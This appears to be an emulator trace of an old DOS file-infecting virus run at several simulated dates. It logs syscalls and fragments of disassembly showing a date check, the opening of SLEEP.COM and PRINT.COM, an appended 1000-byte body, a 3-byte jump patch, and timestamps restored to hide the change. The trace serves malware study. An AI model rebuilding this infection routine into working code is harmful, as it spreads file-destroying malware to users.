{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:14.217670733Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:14.219355565Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:14.220396188Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:14.221380632Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:14.224319805Z 42 PC: 12e96 | Get date 0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
0x12ea7: cmp dl, bh
0x12ea9: jge 0x12eae
0x12eab: jmp 0x12ede
0x12ead: nop
0x12eae: mov dx, 0x1e
0x12eb1: nop
0x12eb2: add dx, si
0x12eb4: mov ah, 9
0x12eb6: int 0x21
0x12eb8: mov byte ptr [0x364], 0
2018-12-25T12:36:14.226412299Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:14.232031518Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:14.237491735Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:14.252424731Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:14.25854695Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:14.259690051Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.261732918Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.267589107Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:14.269545106Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.27784345Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:14.278997324Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.285038902Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.286995734Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.29434623Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.303755839Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.306718229Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.308208169Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.309592448Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:14.311098381Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:14.313175657Z 42 PC: 12aae | Get date 0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
0x12abf: cmp dl, bh
0x12ac1: jge 0x12ac6
0x12ac3: jmp 0x12af6
0x12ac5: nop
0x12ac6: mov dx, 0x1e
0x12ac9: nop
0x12aca: add dx, si
0x12acc: mov ah, 9
0x12ace: int 0x21
0x12ad0: mov byte ptr [0x364], 0
2018-12-25T12:36:14.31529396Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.321538488Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.323960339Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.32927408Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.342134202Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.348444282Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:14.349794421Z 44 PC: 12bec | Get time 0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.352562517Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.358764748Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.360062444Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.37125101Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.373841592Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.385919623Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.388994773Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.480090731Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.533032862Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:14.330014261Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:14.331720943Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:14.335532199Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:14.337056899Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:14.339626055Z 9 PC: 12eb8 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:14.353829215Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:14.361343284Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:14.367802373Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:14.384604531Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:14.392384055Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:14.394036888Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.397600737Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.404620835Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:14.406270569Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.430995395Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:14.433212422Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.441807604Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.444225068Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.45352622Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.464834577Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.46670014Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.4684687Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.469780718Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:14.471046809Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:14.474637127Z 9 PC: 12ad0 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:14.484072343Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.491092102Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.496555519Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.503325284Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.520415094Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.531556364Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:14.534363508Z 44 PC: 12bec | Get time 0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.537562319Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.569107904Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.571844743Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.582085347Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.584732765Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.592387275Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.594486096Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.605373168Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.617487793Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:14.467642267Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:14.469584659Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:14.471596439Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:14.473270957Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:14.48086332Z 42 PC: 12e96 | Get date 0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
0x12ea7: cmp dl, bh
0x12ea9: jge 0x12eae
0x12eab: jmp 0x12ede
0x12ead: nop
0x12eae: mov dx, 0x1e
0x12eb1: nop
0x12eb2: add dx, si
0x12eb4: mov ah, 9
0x12eb6: int 0x21
0x12eb8: mov byte ptr [0x364], 0
2018-12-25T12:36:14.485512189Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:14.493050333Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:14.499400372Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:14.529156226Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:14.536572341Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:14.538575783Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.541707954Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.549017704Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:14.551002345Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.561156553Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:14.563178025Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.570729435Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.573075455Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.582865713Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.594912925Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.597619071Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.599755375Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.601405848Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:14.603436851Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:14.606564878Z 42 PC: 12aae | Get date 0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
0x12abf: cmp dl, bh
0x12ac1: jge 0x12ac6
0x12ac3: jmp 0x12af6
0x12ac5: nop
0x12ac6: mov dx, 0x1e
0x12ac9: nop
0x12aca: add dx, si
0x12acc: mov ah, 9
0x12ace: int 0x21
0x12ad0: mov byte ptr [0x364], 0
2018-12-25T12:36:14.609664295Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.616722585Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.620600383Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.627701861Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.638590638Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.653675038Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:14.6696177Z 44 PC: 12bec | Get time 0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.672065385Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.680582994Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.682645323Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.692527685Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.695164181Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.702633199Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.704393384Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.719699007Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.742915928Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:15.31313777Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:15.314558882Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:15.315577943Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:15.31645874Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:15.318158426Z 9 PC: 12eb8 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:15.326666237Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:15.330955114Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:15.334437512Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:15.35137248Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:15.360055185Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:15.361929708Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:15.365786378Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:15.371868225Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:15.373692098Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:15.385200033Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:15.386805213Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:15.393063736Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:15.395200239Z 62 PC: 13055 | Close file
2018-12-25T12:36:15.407725782Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:15.417249603Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:15.427117587Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:15.428534183Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:15.429871723Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:15.431711891Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:15.43491325Z 9 PC: 12ad0 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:15.443246314Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:15.454722475Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:15.457318688Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:15.461552357Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:15.474246783Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:15.481475725Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:15.483070948Z 44 PC: 12bec | Get time 0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:15.485356042Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:15.493402175Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:15.494908054Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:15.503230062Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:15.505235161Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:15.511563081Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:15.513123652Z 62 PC: 12c6d | Close file
2018-12-25T12:36:15.521417838Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:15.530936689Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:15.660088336Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:15.662352882Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:15.664637295Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:15.665831878Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:15.668773612Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:15.674663911Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:15.68053136Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:15.698695537Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:15.705451792Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:15.707152605Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:15.709791781Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:15.718381049Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:15.720696533Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:15.726594596Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:15.728364252Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:15.733839882Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:15.735602061Z 62 PC: 13055 | Close file
2018-12-25T12:36:15.743896437Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:15.754024336Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:15.755645157Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:15.758121568Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:15.759482166Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:15.760897877Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:15.764730134Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:15.770781168Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:15.773430792Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:15.780641159Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:15.793253721Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:15.799661524Z 87 PC: 12be0 | Get or set file date and time
